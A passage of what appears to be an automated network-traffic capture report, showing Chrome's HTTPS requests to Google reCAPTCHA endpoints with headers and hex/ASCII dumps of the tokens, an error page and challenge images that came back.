                                                                                                                          2024-12-19 16:08:46 UTC720INData Raw: 31 38 32 35 0d 0a 29 5d 7d 27 0a 5b 22 64 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 35 41 71 66 64 63 55 75 49 65 7a 6c 5f 58 67 76 73 5f 58 48 45 30 4a 33 6b 57 50 45 4f 7a 30 2d 77 63 4e 6c 65 69 57 6b 48 57 31 71 4a 44 34 70 65 77 6d 34 5f 68 54 52 76 6a 36 2d 46 5a 71 2d 42 54 42 74 76 43 47 4b 4c 54 54 73 33 75 73 63 31 47 54 37 52 77 6b 2d 6d 4a 39 6d 76 69 4c 4c 47 43 70 50 69 65 7a 32 36 65 63 49 37 66 49 6e 52 7a 39 59 63 6c 68 54 48 71 54 62 71 4e 63 64 51 77 53 4c 77 33 46 77 41 46 33 73 4a 37 38 4c 5a 71 69 6f 52 34 5a 6c 64 6d 44 32 6b 6e 33 30 37 75 43 70 65 57 6e 46 72 47 44 6d 48 71 47 30 6f 6a 58 32 6e 42 52 6b 76 66 77 7a 4a 73 42 56 43 50 49 6b 70 6e 65 38 55 6d 69 44 4d 6a 5f 56 62 57 73 64 2d 43 2d 4d 33 71 62 73 71 57 6b 41 73 4a
                                                                                                                          Data Ascii: 1825)]}'["dresp","03AFcWeA5AqfdcUuIezl_Xgvs_XHE0J3kWPEOz0-wcNleiWkHW1qJD4pewm4_hTRvj6-FZq-BTBtvCGKLTTs3usc1GT7Rwk-mJ9mviLLGCpPiez26ecI7fInRz9YclhTHqTbqNcdQwSLw3FwAF3sJ78LZqioR4ZldmD2kn307uCpeWnFrGDmHqG0ojX2nBRkvfwzJsBVCPIkpne8UmiDMj_VbWsd-C-M3qbsqWkAsJ
                                                                                                                          2024-12-19 16:08:46 UTC1390INData Raw: 5f 4a 69 4f 56 41 38 7a 65 76 70 33 73 6e 5a 6f 51 4b 6b 6a 53 52 76 34 48 52 50 68 31 45 77 4f 70 33 46 4b 70 31 39 79 58 72 6e 64 52 69 4d 4b 35 37 4b 49 48 47 4c 48 70 78 37 66 41 63 64 44 52 42 64 4c 4d 2d 4f 6b 74 67 76 4e 33 49 72 6b 71 61 49 79 59 65 4d 65 64 6a 50 77 58 62 32 51 65 51 50 54 55 4f 55 78 65 46 37 31 51 49 70 44 35 64 69 44 57 6a 49 76 46 37 42 70 43 5a 76 4e 33 44 66 59 6c 52 6c 4c 57 79 6e 67 46 4c 56 53 77 50 69 56 49 65 35 48 68 72 78 46 68 32 41 6c 49 74 47 44 46 55 64 32 45 6d 61 38 54 7a 68 36 34 59 39 4e 59 66 67 5f 38 56 79 47 41 52 54 51 55 2d 6e 70 32 6b 5f 44 66 42 48 63 39 43 43 44 42 68 55 54 73 31 58 67 39 34 68 49 64 49 64 5a 50 32 4f 61 74 45 37 47 70 6f 77 68 4f 6d 6e 52 47 74 52 65 35 77 6f 46 73 4b 69 58 46 4a 48
                                                                                                                          Data Ascii: _JiOVA8zevp3snZoQKkjSRv4HRPh1EwOp3FKp19yXrndRiMK57KIHGLHpx7fAcdDRBdLM-OktgvN3IrkqaIyYeMedjPwXb2QeQPTUOUxeF71QIpD5diDWjIvF7BpCZvN3DfYlRlLWyngFLVSwPiVIe5HhrxFh2AlItGDFUd2Ema8Tzh64Y9NYfg_8VyGARTQU-np2k_DfBHc9CCDBhUTs1Xg94hIdIdZP2OatE7GpowhOmnRGtRe5woFsKiXFJH
                                                                                                                          2024-12-19 16:08:46 UTC1390INData Raw: 71 6c 59 51 76 5f 53 56 38 6a 32 53 55 37 44 7a 57 69 79 52 4f 76 57 4b 5f 57 32 6f 30 4e 33 51 2d 34 77 55 4f 6e 5f 6a 74 4c 44 65 35 63 70 68 31 4a 62 30 50 46 5a 74 46 67 68 69 58 45 6a 42 45 31 63 55 50 30 78 61 6e 72 41 53 76 49 71 4b 6b 61 7a 61 70 65 33 30 59 34 56 64 6a 58 56 6a 43 5f 72 72 47 4b 6d 45 48 6f 7a 37 65 49 34 78 6d 39 6d 35 69 4f 53 6a 63 79 56 33 35 6f 46 75 4c 39 4b 52 69 44 42 70 34 62 51 73 58 48 69 61 30 68 53 76 57 67 70 38 6f 47 6c 64 59 5a 68 63 67 55 73 62 31 31 69 39 52 42 4a 46 51 76 62 34 71 71 55 71 31 6a 59 5a 48 5f 57 4e 50 52 70 38 6d 56 61 72 7a 79 53 56 48 66 32 4f 4d 36 70 67 69 69 46 4d 71 6b 35 6e 4c 6d 4b 5f 48 62 31 32 47 47 4b 5a 58 4d 68 68 6a 35 50 5a 4c 64 68 77 45 41 50 33 2d 45 57 79 50 6e 69 57 59 66 72
                                                                                                                          Data Ascii: qlYQv_SV8j2SU7DzWiyROvWK_W2o0N3Q-4wUOn_jtLDe5cph1Jb0PFZtFghiXEjBE1cUP0xanrASvIqKkazape30Y4VdjXVjC_rrGKmEHoz7eI4xm9m5iOSjcyV35oFuL9KRiDBp4bQsXHia0hSvWgp8oGldYZhcgUsb11i9RBJFQvb4qqUq1jYZH_WNPRp8mVarzySVHf2OM6pgiiFMqk5nLmK_Hb12GGKZXMhhj5PZLdhwEAP3-EWyPniWYfr
                                                                                                                          2024-12-19 16:08:46 UTC1390INData Raw: 46 32 47 6f 35 64 31 78 57 6a 56 47 76 4f 72 68 6e 64 37 62 4b 7a 32 70 6f 5f 4d 54 39 69 43 54 66 6c 39 35 50 78 4e 56 30 32 69 76 78 59 55 72 5a 6e 67 66 50 6f 34 72 69 68 33 55 52 4c 71 38 69 76 30 70 38 35 79 58 4c 6c 78 45 55 4f 2d 7a 7a 33 73 53 43 71 6c 5a 6c 37 2d 72 63 72 37 5a 5f 70 53 6a 76 42 69 4b 63 6b 6d 54 59 52 72 44 58 2d 6a 34 79 72 6c 33 4b 67 67 73 42 4b 69 2d 45 63 35 32 2d 77 4d 41 52 6f 50 50 4e 56 67 43 54 69 33 65 54 6d 42 5a 6b 6d 55 49 38 51 69 33 53 6d 39 65 79 33 4a 46 47 72 42 64 76 77 38 4d 6e 55 66 64 55 69 59 54 4e 55 57 62 52 52 56 57 6c 49 6d 71 50 47 69 7a 34 64 6c 43 53 63 66 73 4c 51 4a 64 33 68 30 2d 64 45 6a 46 65 69 65 4d 67 4f 34 44 52 53 5a 41 76 47 67 75 56 6f 66 6c 31 65 5f 79 52 79 36 44 32 74 53 4b 62 77 42
                                                                                                                          Data Ascii: F2Go5d1xWjVGvOrhnd7bKz2po_MT9iCTfl95PxNV02ivxYUrZngfPo4rih3URLq8iv0p85yXLlxEUO-zz3sSCqlZl7-rcr7Z_pSjvBiKckmTYRrDX-j4yrl3KggsBKi-Ec52-wMARoPPNVgCTi3eTmBZkmUI8Qi3Sm9ey3JFGrBdvw8MnUfdUiYTNUWbRRVWlImqPGiz4dlCScfsLQJd3h0-dEjFeieMgO4DRSZAvGguVofl1e_yRy6D2tSKbwB
                                                                                                                          2024-12-19 16:08:46 UTC1299INData Raw: 6d 63 49 78 31 74 6f 53 38 35 64 67 5a 6b 43 69 66 4c 50 5a 2d 4e 78 76 64 74 73 54 37 6a 4a 54 51 67 51 44 4f 2d 4f 6c 4b 69 4f 56 6c 65 4a 31 4d 6d 50 76 43 67 32 41 67 54 4b 50 78 41 4e 30 6f 37 4f 70 69 44 4b 34 7a 54 6f 7a 57 7a 33 76 76 6d 51 77 4a 4e 78 6f 7a 39 6b 74 52 6c 31 62 58 44 78 49 4e 66 68 4c 73 55 6e 7a 49 70 35 6f 6b 69 45 35 36 68 69 34 2d 4c 31 68 59 43 7a 78 59 37 43 45 68 57 45 64 4b 52 6b 33 45 72 42 53 47 39 4f 31 42 65 6b 43 32 69 43 62 5a 34 66 63 39 54 61 55 73 6c 54 6c 58 6d 62 39 4e 48 36 53 37 6b 6f 37 6e 51 4a 36 4f 77 43 51 6c 64 52 2d 5f 5f 75 49 6a 6e 30 57 6c 67 78 42 5f 35 41 70 64 68 56 64 4c 32 71 38 75 31 76 58 4d 6c 56 6d 70 65 6b 6a 38 74 59 42 73 59 53 64 2d 75 77 6e 62 45 51 33 51 68 32 62 49 4e 43 32 6f 6c 59
                                                                                                                          Data Ascii: mcIx1toS85dgZkCifLPZ-NxvdtsT7jJTQgQDO-OlKiOVleJ1MmPvCg2AgTKPxAN0o7OpiDK4zTozWz3vvmQwJNxoz9ktRl1bXDxINfhLsUnzIp5okiE56hi4-L1hYCzxY7CEhWEdKRk3ErBSG9O1BekC2iCbZ4fc9TaUslTlXmb9NH6S7ko7nQJ6OwCQldR-__uIjn0WlgxB_5ApdhVdL2q8u1vXMlVmpekj8tYBsYSd-uwnbEQ3Qh2bINC2olY
                                                                                                                          2024-12-19 16:08:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          30192.168.2.1649770172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:48 UTC612OUTGET /recaptcha/api2/replaceimage?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:49 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:48 GMT
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Allow: POST
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-12-19 16:08:49 UTC647INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                          Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                          2024-12-19 16:08:49 UTC1024INData Raw: 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                          Data Ascii: body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background
                                                                                                                          2024-12-19 16:08:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          31192.168.2.1649769172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:48 UTC1168OUTGET /recaptcha/api2/payload?p=06AFcWeA4R_QY_jWM4psKCppaabuXLr6uHjmT8p8DHLe7zlxgQhMhGXlyUAf7OUlRaZD0LXikMxTybgvRbG1HsedWOw_qSDAE7Ipm-6OfTAePeERiks09k6k-s-PD_Xs_tthF-q7_DPoOyp4Zv6taXhVz6NiIW5Ma3eapxc3I0OnxkhpGvNdVsOC4hM9P9vnNScmNCX1XUa5sb&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=101b83b365ac88f4 HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:49 UTC681INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Expires: Thu, 19 Dec 2024 16:08:48 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:48 GMT
                                                                                                                          Cache-Control: private, max-age=30
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2024-12-19 16:08:49 UTC709INData Raw: 31 34 33 37 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                          Data Ascii: 1437JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                          2024-12-19 16:08:49 UTC1390INData Raw: 3b 61 76 48 33 26 71 91 8c 60 75 1c 8f 71 59 ad 7c c3 66 92 57 5f a9 14 cf b3 51 79 54 18 83 e4 b3 42 4a bb 03 9e 70 09 24 e7 18 e8 32 3f 3a ff 00 24 a8 5d 4c 4b 6c c9 9c a3 00 0b 81 80 c3 a7 04 ab 0c 67 1d 7d aa 6b bf 26 e6 db 63 22 e3 22 55 cb 74 c1 73 82 38 1f c5 81 d4 7e f0 1f ac 06 61 1c a2 08 e4 f2 a1 cc 7b 09 70 1f e6 5c b6 73 82 3e f6 73 83 f4 19 38 57 b4 7d 05 17 2d 10 f1 24 e2 c5 cc f6 d2 01 09 65 20 e6 36 45 da 08 53 c7 40 4e 3e 5f ef 1e 39 e5 8e 88 ec 90 f9 e0 49 33 16 52 58 a8 24 0e 3f de c6 70 39 1d 46 33 9a 8a f1 63 8e 59 61 92 66 54 94 bc 8a 18 1e 06 e6 c1 c7 1c e0 e7 07 fb a3 bd 2c 7e 68 ba 9e 34 67 8c 65 9d 55 a3 3f 23 ed 24 83 f5 cf 00 90 30 16 b4 5d d7 50 7a cb 9b fa ed f9 87 fa 3d c4 98 85 96 31 21 ca 2a cc 19 f9 dc 40 c6 30 40 e3 91
                                                                                                                          Data Ascii: ;avH3&q`uqY|fW_QyTBJp$2?:$]LKlg}k&c""Uts8~a{p\s>s8W}-$e 6ES@N>_9I3RX$?p9F3cYafT,~h4geU?#$0]Pz=1!*@0@
                                                                                                                          2024-12-19 16:08:49 UTC1390INData Raw: 6c e4 29 19 18 3c 72 00 e7 9c d6 75 ac 65 99 2d d6 69 51 5a 31 b0 1e 42 92 38 f9 81 39 e4 83 df 80 4d 58 9c db 88 45 aa 33 31 96 72 b1 c9 b4 aa b4 9c b1 ea 4e 38 c6 09 1c fb f3 50 a9 db 24 c4 16 69 17 00 07 6d bb 72 87 73 0c e7 20 10 09 cf 23 00 d6 f1 5a 35 b1 71 b2 5f f0 17 f5 fa fe 42 ab ba 5c 98 a3 59 5a e9 76 06 05 b2 56 40 7e f2 65 b0 14 1c 1c 7f b8 41 35 25 9d cc 01 24 8e 24 32 05 6d a8 63 c0 75 ce 3f 78 09 c0 e1 80 c9 39 24 6d e8 7a d6 b8 85 a4 8a 2b 70 c2 45 84 ba 48 03 6d 11 70 c3 a0 c8 27 2d 93 91 ef dc d3 1a 70 6e 1d fc e6 08 e5 59 80 19 c3 ee 3c 67 a1 c9 c7 1b 87 23 35 a3 49 87 2f 34 4d 99 ee d3 ed 91 4a c6 20 4e c8 98 29 df c6 ec 8c 00 17 df e6 c7 a7 6e a9 a7 5d cd 69 a4 0d 42 ce 56 8a e8 5d 06 74 12 29 6c 2e 48 fd d9 07 f8 81 fb de dc 77 ac
                                                                                                                          Data Ascii: l)<rue-iQZ1B89MXE31rN8P$imrs #Z5q_B\YZvV@~eA5%$$2mcu?x9$mz+pEHmp'-pnY<g#5I/4MJ N)n]iBV]t)l.Hw
                                                                                                                          2024-12-19 16:08:49 UTC1390INData Raw: 7b 23 e9 f5 cd 15 0d ac f6 c2 33 18 b9 80 2c 67 68 32 dc 3a b3 0c 67 27 9e 7a f5 ef 45 70 ca 53 4e c9 bf b9 0b da 46 1a 73 b5 f2 27 b8 94 ad ba 98 64 fb 3e c3 b2 52 b8 00 92 0e ee 8d f5 18 1e 9c f6 ce 5e a3 aa 97 4f 2a 3c b2 ee dd 96 38 f3 18 f7 f9 70 71 90 39 fa f5 e9 55 ef ef 12 e2 e4 4a a8 a2 19 32 59 49 08 ca b9 63 82 a0 e4 0f 98 fe 1e b5 9f 26 e6 40 40 4c 73 85 23 2a 00 c7 50 33 8c 71 91 d7 9f 4a ec 85 18 f5 5b 7f 5f d6 c3 7c bf 0f 4f eb fa f3 27 45 ba b9 6c 20 79 64 2c c0 02 dc 01 d3 1d 08 fc c7 35 6f 0e ac 10 06 5c 9c ab aa 80 c5 b9 27 e6 f5 c6 0f 6e 7b d4 6e ef 06 63 52 45 d4 d9 2e d3 01 f2 ee e3 20 e3 82 71 f9 74 a6 88 4e c9 23 0d 0c 32 6d 06 37 20 63 19 cf 20 f4 e7 23 93 d4 0a 15 df bc f4 14 6f b7 7f eb fa ef e4 3a fe 44 60 cc 25 1b 4e 15 90 03
                                                                                                                          Data Ascii: {#3,gh2:g'zEpSNFs'd>R^O*<8pq9UJ2YIc&@@Ls#*P3qJ[_|O'El yd,5o\'n{ncRE. qtN#2m7 c #o:D`%N
                                                                                                                          2024-12-19 16:08:49 UTC304INData Raw: c9 1d 4e 3d cd 14 52 7b 33 16 ad 4d bf 5f c9 16 74 c7 fb 42 41 26 d5 8c 85 44 da 83 e5 fb a4 83 83 9e 47 6a 5b cf dd 31 fe 33 17 96 ca 5f 93 f3 92 48 3e bc 80 7d 78 a2 8a 56 56 bf a7 e6 cc 29 af 79 19 ef 34 93 47 1d bb b9 29 71 30 86 4f 52 a0 71 cf 5e bc d4 b7 13 3c 31 23 42 c6 31 20 60 50 12 54 6d 52 06 01 cf 4c 9a 28 ab 49 73 5b c9 fe a5 47 e2 f9 3f c8 bb a5 3f 9c 6d 24 28 88 56 e0 05 08 31 8f 97 24 8f 4c 93 9f c0 55 8b 1d ba 8d ec 62 e1 14 29 dc 08 5f 68 c3 8e be 85 46 0f 5a 28 ac 5e 95 1b 5d 97 e6 53 76 82 7e bf a9 5e d5 9a 69 ec d1 dd c9 9e 21 2c 8e 5c 96 24 2a 9e a4 9c 0c 93 50 5b 05 9a 64 8d 94 2a 1b 55 99 95 78 dc c4 a8 3c f5 c7 b0 c5 14 55 df dd 7f 33 28 6a e3 7f 3f cd 96 a4 4c 45 a9 ce 19 83 c4 8c a0 83 f7 b9 07 9a 8c b0 8e d9 e5 44 50 f0 c8 42
                                                                                                                          Data Ascii: N=R{3M_tBA&DGj[13_H>}xVV)y4G)q0ORq^<1#B1 `PTmRL(Is[G??m$(V1$LUb)_hFZ(^]Sv~^i!,\$*P[d*Ux<U3(j?LEDPB
                                                                                                                          2024-12-19 16:08:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          32192.168.2.1649772172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:50 UTC836OUTGET /recaptcha/api2/payload?p=06AFcWeA4R_QY_jWM4psKCppaabuXLr6uHjmT8p8DHLe7zlxgQhMhGXlyUAf7OUlRaZD0LXikMxTybgvRbG1HsedWOw_qSDAE7Ipm-6OfTAePeERiks09k6k-s-PD_Xs_tthF-q7_DPoOyp4Zv6taXhVz6NiIW5Ma3eapxc3I0OnxkhpGvNdVsOC4hM9P9vnNScmNCX1XUa5sb&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=101b83b365ac88f4 HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:51 UTC681INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Expires: Thu, 19 Dec 2024 16:08:51 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:51 GMT
                                                                                                                          Cache-Control: private, max-age=30
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2024-12-19 16:08:51 UTC709INData Raw: 31 34 33 37 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                          Data Ascii: 1437JFIFC!"$"$Cdd"}!1AQa"q
